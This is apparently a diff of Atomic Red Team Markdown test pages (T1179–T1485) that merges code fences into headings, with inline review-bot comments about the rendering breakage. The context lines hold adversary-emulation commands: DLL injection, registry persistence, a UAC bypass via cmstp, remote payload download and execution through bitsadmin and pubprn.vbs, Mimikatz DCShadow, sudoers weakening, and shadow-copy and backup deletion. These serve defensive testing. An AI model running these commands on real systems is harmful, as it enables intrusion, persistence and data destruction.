+#### Run it with these steps! 1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
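Review bot: step 1 with the web store URL is folded into the heading; `in Chrome` becomes an orphan line. Steps must start after the heading.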
@@ -56,8 +54,7 @@ Create a file called test.wma, with the duration of 30 seconds
**Supported Platforms:** Linux, Windows, macOS
-#### Run it with these steps!
-1. Navigate to [about:debugging](about:debugging) and
+#### Run it with these steps! 1. Navigate to [about:debugging](about:debugging) and
click "Load Temporary Add-on"
2. Navigate to [manifest.json](./manifest.json)
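Review bot: `1. Navigate to [about:debugging](about:debugging) and` is merged into the heading; `click "Load Temporary Add-on"` is orphaned and `2. Navigate to [manifest.json](./manifest.json)` becomes the first list item.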
diff --git a/atomics/T1179/T1179.md b/atomics/T1179/T1179.md
index 58c442f1..9af31381 100644
--- a/atomics/T1179/T1179.md
+++ b/atomics/T1179/T1179.md
@@ -33,8 +33,7 @@ Hooks functions in PowerShell to read TLS Communications
| file_name | Dll To Inject | Path | C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll|
| server_name | TLS Server To Test Get Request | Url | https://www.example.com|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
mavinject $pid /INJECTRUNNING #{file_name}
curl #{server_name}
```
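Review bot: fence regression around `mavinject $pid /INJECTRUNNING #{file_name}` and `curl #{server_name}`; as text `$pid` reads as prose. Restore the fence.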
diff --git a/atomics/T1180/T1180.md b/atomics/T1180/T1180.md
index 97eafb50..62ac20dc 100644
--- a/atomics/T1180/T1180.md
+++ b/atomics/T1180/T1180.md
@@ -29,8 +29,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc
|------|-------------|------|---------------|
| input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 60 /f
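Review bot: merged fence; the `copy ... evilscreensaver.scr` and `reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" ...` lines lose their code block, and the hunk ends mid-block.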
diff --git a/atomics/T1183/T1183.md b/atomics/T1183/T1183.md
index 145d6399..f600b8ac 100644
--- a/atomics/T1183/T1183.md
+++ b/atomics/T1183/T1183.md
@@ -37,8 +37,7 @@ Leverage Global Flags Settings
| target_binary | Binary To Attach To | Path | winword.exe|
| payload_binary | Binary To Execute | Path | cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
```
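Review bot: fence folded into heading; the long `REG ADD ... Image File Execution Options\#{target_binary} /v Debugger ...` line renders as text.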
@@ -56,8 +55,7 @@ Leverage Global Flags Settings
| target_binary | Binary To Attach To | Path | notepad.exe|
| payload_binary | Binary To Execute | Path | cmd.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
```
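Review bot: apart from the merged fence, the three `REG ADD` commands are joined onto one line; cmd hands everything after the first `/d 512` to the first `REG ADD` as extra arguments and rejects it, so the GlobalFlag/SilentProcessExit sequence never runs as written. Each `REG ADD` needs its own line, as in the T1180 block above.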
diff --git a/atomics/T1191/T1191.md b/atomics/T1191/T1191.md
index fa2ee84e..cd9fe067 100644
--- a/atomics/T1191/T1191.md
+++ b/atomics/T1191/T1191.md
@@ -26,8 +26,7 @@ Adversaries may supply CMSTP.exe with INF files infected with malicious commands
|------|-------------|------|---------------|
| inf_file_path | Path to the INF file | path | T1191.inf|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmstp.exe /s #{inf_file_path}
```
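Review bot: fence merged into heading; `cmstp.exe /s #{inf_file_path}` renders as text.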
@@ -44,8 +43,7 @@ Adversaries may invoke cmd.exe (or other malicious commands) by embedding them i
|------|-------------|------|---------------|
| inf_file_uac | Path to the INF file | path | T1191_uacbypass.inf|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmstp.exe /s #{inf_file_uac} /au
```
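Review bot: same regression for `cmstp.exe /s #{inf_file_uac} /au`.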
diff --git a/atomics/T1193/T1193.md b/atomics/T1193/T1193.md
index bd02af64..18e416ac 100644
--- a/atomics/T1193/T1193.md
+++ b/atomics/T1193/T1193.md
@@ -18,8 +18,7 @@ The below will successfully download the macro-enabled Excel file to the current
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){
return 'Please install Microsoft Excel before running this test.'
}
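Review bot: the `+#### Run it with `powershell`! ```` line at -18 leaves the multi-line PowerShell block (`if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){` ... `}`) outside any code fence, so the braces and `return` line render as running text and the block's closing ``` later in the file inverts code and prose for the rest of the page. Put the fence back on its own line after the heading, as in the removed `-` lines.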
diff --git a/atomics/T1196/T1196.md b/atomics/T1196/T1196.md
index c458b43c..667d9690 100644
--- a/atomics/T1196/T1196.md
+++ b/atomics/T1196/T1196.md
@@ -24,8 +24,7 @@ This test simulates an adversary leveraging control.exe to execute a payload and
|------|-------------|------|---------------|
| cpl_file_path | path to cpl file | path | calc.cpl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
control.exe #{cpl_file_path}
```
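Review bot: the `+#### Run it with `command_prompt`! ```` change at -24 breaks the code block around `control.exe #{cpl_file_path}`; an opening fence has to be the first thing on its line for Markdown to honour it. Keep `#### Run it with `command_prompt`!` and ```` ``` ```` as separate lines, as the removed lines had them.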
diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md
index a5281693..18d29e36 100644
--- a/atomics/T1197/T1197.md
+++ b/atomics/T1197/T1197.md
@@ -32,8 +32,7 @@ and execute a payload
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
```
@@ -52,8 +51,7 @@ and execute a payload leveraging PowerShell
| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
| local_file | Local file path to save downloaded file | path | C:\Windows\Temp\bitsadmin_flag.ps1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
```
@@ -75,8 +73,7 @@ and execute a payload in multiple steps. This job will remain in the BITS queue
| command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe|
| command_line | Command line to execute | string | C:\Windows\Temp\bitsadmin_flag.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
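Review bot: all three hunks in T1197.md (-32, -52 and -75) merge the opening fence into the `#### Run it with ...!` heading, so the `bitsadmin.exe /transfer ...`, `Start-BitsTransfer ...` and the three-step `bitsadmin.exe /create` ... `/setnotifycmdline` blocks will not render as code. The third hunk is the one that hurts most: without the fence the backslashes in `#{local_file}`-style Windows paths are subject to Markdown escaping, so a reader copying the commands gets mangled paths. Restore the separate heading and fence lines from the `-` side in each hunk.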
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index 1191b36d..43bddab0 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -40,8 +40,7 @@ Lists the password complexity policy to console on Ubuntu Linux.
**Supported Platforms:** Ubuntu
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /etc/pam.d/common-password
```
@@ -53,8 +52,7 @@ Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
**Supported Platforms:** CentOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /etc/security/pwquality.conf
```
@@ -66,8 +64,7 @@ Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
**Supported Platforms:** CentOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /etc/pam.d/system-auth
cat /etc/security/pwquality.conf
@@ -81,8 +78,7 @@ Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
**Supported Platforms:** Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /etc/login.defs
```
@@ -94,8 +90,7 @@ Lists the local password policy to console on Windows.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net accounts
```
@@ -107,8 +102,7 @@ Lists the domain password policy to console on Windows.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net accounts /domain
```
@@ -120,8 +114,7 @@ Lists the password policy to console on Windows.
**Supported Platforms:** macOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
pwpolicy getaccountpolicies
```
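Review bot: every hunk in T1201.md (-40 through -120) carries the same defect: the `-#### Run it with `bash`!` / `-```` pair is replaced by one line with the fence appended to the heading, which stops each `cat ...`, `net accounts` and `pwpolicy getaccountpolicies` block from rendering as code. Separately, the hunk header context at -120 reads "Lists the password policy to console on Windows." while the test's platform line is `**Supported Platforms:** macOS` and the command is `pwpolicy getaccountpolicies`; that description looks copy-pasted from the Windows tests and is worth correcting in the source YAML while this file is being touched.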
diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md
index 1085d8e6..c4d2b7a8 100644
--- a/atomics/T1202/T1202.md
+++ b/atomics/T1202/T1202.md
@@ -28,8 +28,7 @@ The Program Compatibility Assistant (pcalua.exe) may invoke the execution of pro
| payload_path | Path to payload | path | c:\temp\payload.dll|
| payload_cpl_path | Path to payload | path | C:\Windows\system32\javacpl.cpl -c Java|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
pcalua.exe -a #{process}
pcalua.exe -a #{payload_path}
pcalua.exe -a #{payload_cpl_path}
@@ -52,8 +51,7 @@ forfiles.exe may invoke the execution of programs and commands from a Command-Li
|------|-------------|------|---------------|
| process | Process to execute | string | calc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
```
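Review bot: both hunks in T1202.md (-28 `pcalua.exe -a ...` and -52 `forfiles ...`) put the opening fence on the heading line (`+#### Run it with `command_prompt`! ````), so the multi-line command lists that follow are no longer inside a code block. The `forfiles` hunk contains a literal `c:\folder\normal.dll:evil.exe` argument; outside a fence, Markdown treats those backslashes as escapes and the path will not survive rendering. Keep the fence on its own line as in the removed lines.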
diff --git a/atomics/T1206/T1206.md b/atomics/T1206/T1206.md
index 7f78c607..c5958ccc 100644
--- a/atomics/T1206/T1206.md
+++ b/atomics/T1206/T1206.md
@@ -21,8 +21,7 @@ Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
```
@@ -35,8 +34,7 @@ Sets sudo caching tty_tickets value to disabled. This is dangerous to modify wit
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
```
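Review bot: the two T1206.md hunks (-21 and -35) merge `#### Run it with `sh`!` with the opening fence, which leaves the `sudo sed -i 's/env_reset.*$/.../' /etc/sudoers` and `sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"` lines unfenced. The `*`, `_` and `!` characters in those commands are Markdown-significant, so rendering them as prose will alter the text a reader sees for a command that edits /etc/sudoers, where an exact transcription matters. Restore the separate fence line from the `-` side.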
diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md
index 574248f2..ceb41dd0 100644
--- a/atomics/T1207/T1207.md
+++ b/atomics/T1207/T1207.md
@@ -22,8 +22,7 @@ Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
**Supported Platforms:** Windows
-#### Run it with these steps!
-1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
+#### Run it with these steps! 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
4. lsadump::dcshadow /push
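Review bot: the `+#### Run it with these steps! 1. Start Mimikatz ...` line at -22 folds step 1 of the ordered list into the heading, so the rendered list begins at "2. Start another mimikatz ..." and the instruction to escalate to SYSTEM with `!processtoken` becomes part of the heading text. Keep `#### Run it with these steps!` on its own line and `1. Start Mimikatz and use !processtoken ...` as the first list item, as in the removed `-` lines.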
diff --git a/atomics/T1214/T1214.md b/atomics/T1214/T1214.md
index 5079e632..8d7b7be2 100644
--- a/atomics/T1214/T1214.md
+++ b/atomics/T1214/T1214.md
@@ -20,8 +20,7 @@ Queries to enumerate for credentials in the Registry.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
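Review bot: the hunk at -20 in T1214.md appends the opening fence to the heading (`+#### Run it with `command_prompt`! ````), so the two `reg query ... /f password /t REG_SZ /s` lines fall outside the code block. Restore the fence on its own line after the heading.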
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index 77f15e5d..ac85be65 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -24,8 +24,7 @@ Executes the signed PubPrn.vbs script with options to download and execute an ar
|------|-------------|------|---------------|
| remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
```
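Review bot: the hunk at -24 in T1216.md merges the fence into the heading line, leaving the `cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"` command unfenced; the underscores and backslashes in that path are Markdown-significant and will not render faithfully. Keep the fence on a separate line as in the removed lines.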
diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md
index 32c8e9aa..afe25fa0 100644
--- a/atomics/T1217/T1217.md
+++ b/atomics/T1217/T1217.md
@@ -21,8 +21,7 @@ Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
```
@@ -34,8 +33,7 @@ Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookm
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
```
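Review bot: both T1217.md hunks (-21 Linux and -34 macOS) replace the heading/fence pair with a single `+#### Run it with `sh`! ```` line, so the `find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;` commands are rendered as prose; the `*` and `\;` sequences in them will be consumed as Markdown emphasis and escapes. Restore the separate fence line.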
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 8b146ee9..4a0369df 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -48,8 +48,7 @@ Injects arbitrary DLL into running process specified by process ID. Requires Win
| dll_payload | DLL to inject | Path | C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll|
| process_id | PID of process receiving injection | string | 1000|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
```
@@ -66,8 +65,7 @@ Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires
|------|-------------|------|---------------|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
SyncAppvPublishingServer.exe "n; #{powershell_code}"
```
@@ -84,8 +82,7 @@ Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
```
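Review bot: all three hunks in T1218.md (-48 `mavinject.exe`, -66 `SyncAppvPublishingServer.exe`, -84 `Register-CimProvider.exe`) merge the opening fence into the heading, which drops the command lines out of their code blocks and makes the trailing ``` open a block in the wrong place. Restore the `-#### Run it with `command_prompt`!` and `-```` lines as two lines.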
diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md
index dcc29282..49f7e327 100644
--- a/atomics/T1220/T1220.md
+++ b/atomics/T1220/T1220.md
@@ -40,8 +40,7 @@ Executes the code specified within a XSL script tag during XSL transformation us
| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml|
| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
```
@@ -59,8 +58,7 @@ Executes the code specified within a XSL script tag during XSL transformation us
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
```
@@ -78,8 +76,7 @@ Executes the code specified within a XSL script using a local payload.
| wmic_command | WMI command to execute using wmic.exe | string | process list|
| local_xsl_file | Location of the test XSL script file on the local filesystem. | path | C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
```
@@ -97,8 +94,7 @@ Executes the code specified within a XSL script using a remote payload.
| wmic_command | WMI command to execute using wmic.exe | string | process list|
| remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
```
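Review bot: the four T1220.md hunks (-40 and -59 `msxsl.exe`, -78 and -97 `wmic.exe ... /FORMAT:...`) all have the fence folded into the heading line. Beyond the rendering breakage, note that `/FORMAT:#{local_xsl_file}` and `/FORMAT:#{remote_xsl_file}` contain underscores that Markdown will read as emphasis markers once they are outside a code block, so the placeholder names themselves will render wrongly. Keep the fence on its own line as in the removed lines.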
diff --git a/atomics/T1222/T1222.md b/atomics/T1222/T1222.md
index 6f3882ac..168626f9 100644
--- a/atomics/T1222/T1222.md
+++ b/atomics/T1222/T1222.md
@@ -52,8 +52,7 @@ Modifies the filesystem permissions of the specified file or folder to take owne
|------|-------------|------|---------------|
| file_folder_to_own | Path of the file or folder for takeown to take ownership. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
takeown.exe /f #{file_folder_to_own}
```
@@ -70,8 +69,7 @@ Modifies the filesystem permissions of the specified folder to take ownership of
|------|-------------|------|---------------|
| folder_to_own | Path of the folder for takeown to take ownership. | path | C:\AtomicRedTeam\atomics\T1222|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
takeown.exe /f #{folder_to_own} /r
```
@@ -89,8 +87,7 @@ Modifies the filesystem permissions of the specified file or folder to allow the
| file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml|
| user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cacls.exe #{file_or_folder} /grant #{user_or_group}:F
```
@@ -108,8 +105,7 @@ Modifies the filesystem permissions of the specified folder and contents to allo
| file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222|
| user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
```
@@ -127,8 +123,7 @@ Modifies the filesystem permissions of the specified file or folder to allow the
| file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222\T1222.yaml|
| user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
icacls.exe #{file_or_folder} /grant #{user_or_group}:F
```
@@ -146,8 +141,7 @@ Modifies the filesystem permissions of the specified folder and contents to allo
| file_or_folder | Path of the file or folder to change permissions. | path | C:\AtomicRedTeam\atomics\T1222|
| user_or_group | User or group to allow full control | string | Everyone|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
```
@@ -164,8 +158,7 @@ Removes the read-only attribute from a file or folder using the attrib.exe comma
|------|-------------|------|---------------|
| file_or_folder | Path of the file or folder remove attribute. | path | C:\AtomicRedTeam\atomics\T1222|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
attrib.exe -r #{file_or_folder}
```
@@ -183,8 +176,7 @@ Changes a file or folder's permissions using chmod and a specified numeric mode.
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| numeric_mode | Specified numeric mode value | string | 755|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chmod #{numeric_mode} #{file_or_folder}
```
@@ -202,8 +194,7 @@ Changes a file or folder's permissions using chmod and a specified symbolic mode
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| symbolic_mode | Specified symbolic mode value | string | a+w|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chmod #{symbolic_mode} #{file_or_folder}
```
@@ -221,8 +212,7 @@ Changes a file or folder's permissions recursively using chmod and a specified n
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| numeric_mode | Specified numeric mode value | string | 755|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chmod #{numeric_mode} #{file_or_folder} -R
```
@@ -240,8 +230,7 @@ Changes a file or folder's permissions recursively using chmod and a specified s
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| symbolic_mode | Specified symbolic mode value | string | a+w|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chmod #{symbolic_mode} #{file_or_folder} -R
```
@@ -260,8 +249,7 @@ Changes a file or folder's ownership and group information using chown.
| owner | Username of desired owner | string | root|
| group | Group name of desired group | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chown #{owner}:#{group} #{file_or_folder}
```
@@ -280,8 +268,7 @@ Changes a file or folder's ownership and group information recursively using cho
| owner | Username of desired owner | string | root|
| group | Group name of desired group | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chown #{owner}:#{group} #{file_or_folder} -R
```
@@ -299,8 +286,7 @@ Changes a file or folder's ownership only using chown.
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222/T1222.yaml|
| owner | Username of desired owner | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chown #{owner} #{file_or_folder}
```
@@ -318,8 +304,7 @@ Changes a file or folder's ownership only recursively using chown.
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
| owner | Username of desired owner | string | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
chown #{owner} #{file_or_folder} -R
```
@@ -337,8 +322,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux
|------|-------------|------|---------------|
| file_to_modify | Path of the file | path | /var/spool/cron/root|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
chattr -i #{file_to_modify}
```
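Review bot: every one of the sixteen hunks in T1222.md (-52 through -337) applies the same heading/fence merge (`+#### Run it with `command_prompt`! ```` or `+#### Run it with `bash`! ````), so none of the `takeown.exe`, `cacls.exe`, `icacls.exe`, `attrib.exe`, `chmod`, `chown` or `chattr -i` commands will render as code. The `icacls.exe #{file_or_folder} /grant #{user_or_group}:F` lines are a good illustration of why this matters: the `_` in the placeholders and the `:F` suffix are easy to misread once they are body text. Restore the two-line form throughout rather than fixing individual hunks.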
diff --git a/atomics/T1223/T1223.md b/atomics/T1223/T1223.md
index f1a6d3db..b3158791 100644
--- a/atomics/T1223/T1223.md
+++ b/atomics/T1223/T1223.md
@@ -24,8 +24,7 @@ Uses hh.exe to execute a local compiled HTML Help payload.
|------|-------------|------|---------------|
| local_chm_file | Local .chm payload | path | C:\atomic-red-team\atomics\T1223\src\T1223.chm|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
hh.exe #{local_chm_file}
```
@@ -42,8 +41,7 @@ Uses hh.exe to execute a remote compiled HTML Help payload.
|------|-------------|------|---------------|
| remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
hh.exe #{remote_chm_file}
```
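Review bot: both T1223.md hunks (-24 `hh.exe #{local_chm_file}` and -42 `hh.exe #{remote_chm_file}`) append the opening fence to the heading. Restore the separate `#### Run it with `command_prompt`!` and ```` ``` ```` lines from the `-` side so the commands stay fenced.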
diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md
index 170c7bc3..1728911a 100644
--- a/atomics/T1482/T1482.md
+++ b/atomics/T1482/T1482.md
@@ -18,8 +18,7 @@ Requires the installation of dsquery via Windows RSAT or the Windows Server AD D
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
dsquery * -filter "(objectClass=trustedDomain)" -attr *
```
@@ -33,8 +32,7 @@ This technique has been used by the Trickbot malware family.
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
nltest /domain_trusts
```
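Review bot: the two T1482.md hunks (-18 `dsquery * -filter "(objectClass=trustedDomain)" -attr *` and -33 `nltest /domain_trusts`) merge the fence into the heading line. The `dsquery` line is especially affected: its two `*` characters become an emphasis span once the line is outside a code block, and `domain_trusts` loses its underscore to emphasis parsing. Keep the fence on its own line as in the removed lines.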
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index b58bf90b..1ad587e8 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -27,8 +27,7 @@ Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomw
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
vssadmin.exe delete shadows /all /quiet
```
@@ -40,8 +39,7 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wbadmin.exe delete catalog -quiet
```
@@ -54,8 +52,7 @@ This technique is used by numerous ransomware families and APT malware such as O
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
@@ -74,8 +71,7 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
|------|-------------|------|---------------|
| file_to_overwrite | Path of file to overwrite and remove | Path | C:\some\file.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
sdelete.exe #{file_to_overwrite}
```
